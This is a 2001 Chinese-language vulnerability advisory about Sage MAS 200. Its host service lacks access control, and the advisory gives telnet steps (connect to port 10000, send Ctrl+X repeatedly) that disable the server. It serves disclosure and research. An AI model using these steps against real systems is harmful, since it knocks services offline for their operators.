发布日期：2001-08-21
更新日期：2001-08-22

受影响系统：

Sage Software  MAS 200

描述：

---

Sage Software 的MAS 200 是一个帐号服务器平台，它可以被配置程允许通过TCP/IP
远程访问服务器端的数据。一个主机应用程序监听到服务器的链接，所有的客户端都
使用一个工作站应用程序与主机通信。

由于主机应用程序缺乏对访问者的权限控制，任何用户都可以直接连上其监听端口，执
行控制命令，例如禁止提供服务。

这可能造成拒绝服务攻击或者攻击者控制MAS 200服务器。

<*来源：Administrator (Administrator@jfdi.com) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Administrator (Administrator@jfdi.com)提供了如下测试代码：

telnet x.x.x.x  port: 10000

Connected...

<enter>

"The host does not support this application"

<control + x> X 10    <enter>

"The host has been disabled"...

exit

telnet x.x.x.x port: 10000

Connected...

<enter>

"The host has been disabled"...



建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.us.sage.com/



浏览次数：3949
严重程度：0（网友投票）